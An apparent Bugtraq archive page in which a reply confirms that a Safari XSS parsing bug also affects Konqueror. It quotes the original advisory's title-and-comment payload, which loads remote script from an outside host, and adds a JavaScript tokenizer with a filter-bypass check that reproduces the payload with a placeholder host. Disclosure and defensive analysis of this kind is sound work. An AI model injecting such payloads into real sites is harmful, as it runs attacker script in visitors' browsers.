Bugtraq mailing list archives
Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability
From: Robert Tasarz <robert.tasarz () greentech pl>
Date: Wed, 24 Jan 2007 06:06:34 +0100
Jose Avila III wrote:
Overview: Safari on occasions may improperly parse the source of an HTML document, which can lead to the execution of HTML tags within comments. This can become dangerous when input filters allow HTML tags within comments, as they will get parsed and executed under certain circumstances.

Details: In some cases you can cause Apple's Safari browser to execute code when it should not be executed. In the following example everything within the comment, in theory, should never be executed; however, Safari decides to execute the script tag.

<title>myblog<!--</title></head><body><script src=http://beanfuzz.com/bean.js> --></title>

Blogs hosted on BlogSpot.com have filter mechanisms for their input; however, they will allow you to inject anything within comments. This made it possible to cross site script blogspot.com.

Note: Only Safari viewers will be affected.

Proof of concept: http://dirtybean1234.blogspot.com/

Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99

Vendor Response: I was unable to get a response from the vendor in regards to this issue.

Questions / Comments: Jose (at) onzra (dot) com
As could be expected, the same problem exists in Konqueror (tested v.3.5.5 on Debian GNU/Linux Sid).

regards,
Robert Tasarz
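The bug the thread describes is a parser differential: the site's filter treats everything between "<!--" and "-->" as one comment, while the browser treats the content of <title> as raw text (RCDATA in HTML5 terms), so "<!--" inside the title is never a comment opener, "</title>" ends the element, and the <script> tag that follows is live markup. The JavaScript below is an added example, not code from either post or from Apple, Blogger or KDE: a naive regex comment stripper beside a small tokenizer that models the two browser rules (comments in the data state, no markup inside <title>/<textarea>). The test input mirrors the PoC quoted above with a placeholder script URL (example.invalid), and the function and constant names are assumptions made for this example.

```javascript
// Added example: parser differential between a regex-based comment filter and a
// tokenizer that handles <title> as raw text the way browsers do. Not from the
// original thread; names and the sample input are constructed for illustration.

// Constructed input with the structure of the posted PoC (placeholder URL).
const POC = '<title>myblog<!--</title></head><body>' +
            '<script src=http://example.invalid/x.js> --></title>';

// Naive filter: strips <!-- ... --> wherever it appears, then looks for a
// surviving <script> tag. This is the view under which the PoC looks harmless.
function naiveFilterSeesScript(html) {
  const stripped = html.replace(/<!--[\s\S]*?-->/g, '');
  return /<script\b/i.test(stripped);
}

// Elements whose content the browser reads as text only (no tags, no comments)
// until the matching end tag appears.
const RCDATA = new Set(['title', 'textarea']);

// Minimal tokenizer modelling two rules:
//  1. In the data state "<!--" opens a comment that runs to "-->".
//  2. Inside an RCDATA element "<!--" is plain text; only "</name" followed by
//     whitespace, "/" or ">" leaves the element.
// Returns the tag names it would hand to the tree builder, outside comments.
function tokenizeTags(html) {
  const tags = [];
  const lower = html.toLowerCase();
  let i = 0;
  let rcdata = null; // name of the RCDATA element we are inside, if any
  while (i < html.length) {
    if (rcdata) {
      let end = lower.indexOf('</' + rcdata, i);
      while (end !== -1) {
        const next = lower.charAt(end + 2 + rcdata.length);
        if (next !== '' && /[\s\/>]/.test(next)) break; // appropriate end tag
        end = lower.indexOf('</' + rcdata, end + 1);
      }
      if (end === -1) break;              // rest of the document is text
      const close = html.indexOf('>', end);
      i = close === -1 ? html.length : close + 1;
      tags.push('/' + rcdata);
      rcdata = null;
      continue;
    }
    if (html.startsWith('<!--', i)) {     // real comment in the data state
      const close = html.indexOf('-->', i + 4);
      i = close === -1 ? html.length : close + 3;
      continue;
    }
    if (html[i] === '<') {
      const m = /^<(\/?)([a-zA-Z][^\s\/>]*)/.exec(html.slice(i));
      if (m) {
        const name = m[2].toLowerCase();
        const close = html.indexOf('>', i);
        i = close === -1 ? html.length : close + 1;
        tags.push(m[1] + name);
        if (!m[1] && RCDATA.has(name)) rcdata = name;
        continue;
      }
    }
    i += 1;
  }
  return tags;
}

// The browser's view: does a <script> start tag reach the tree builder?
function tokenizerSeesScript(html) {
  return tokenizeTags(html).includes('script');
}

// Differential check a filter can run on itself: any input the naive filter
// passes but the tokenizer would execute is a bypass.
function isFilterBypass(html) {
  return !naiveFilterSeesScript(html) && tokenizerSeesScript(html);
}
```

Running `tokenizeTags(POC)` yields `title, /title, /head, body, script, /title`: the "</title>" that the filter thought was inside a comment closes the element, and the script tag is emitted. A genuine comment in the data state, such as `<p>x<!--<script>a()</script>--></p>`, is hidden under both views. The practical lesson for a filter is to make its decisions on the same token stream the browser builds (parse with a real HTML tokenizer and re-serialize) rather than on a regex notion of "comment"; the cheapest fix for a site that has no business accepting comments at all is to reject "<!--" in user input outright.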
Current thread:
- Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Jose Avila III (Jan 23)
- Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Robert Tasarz (Jan 24)
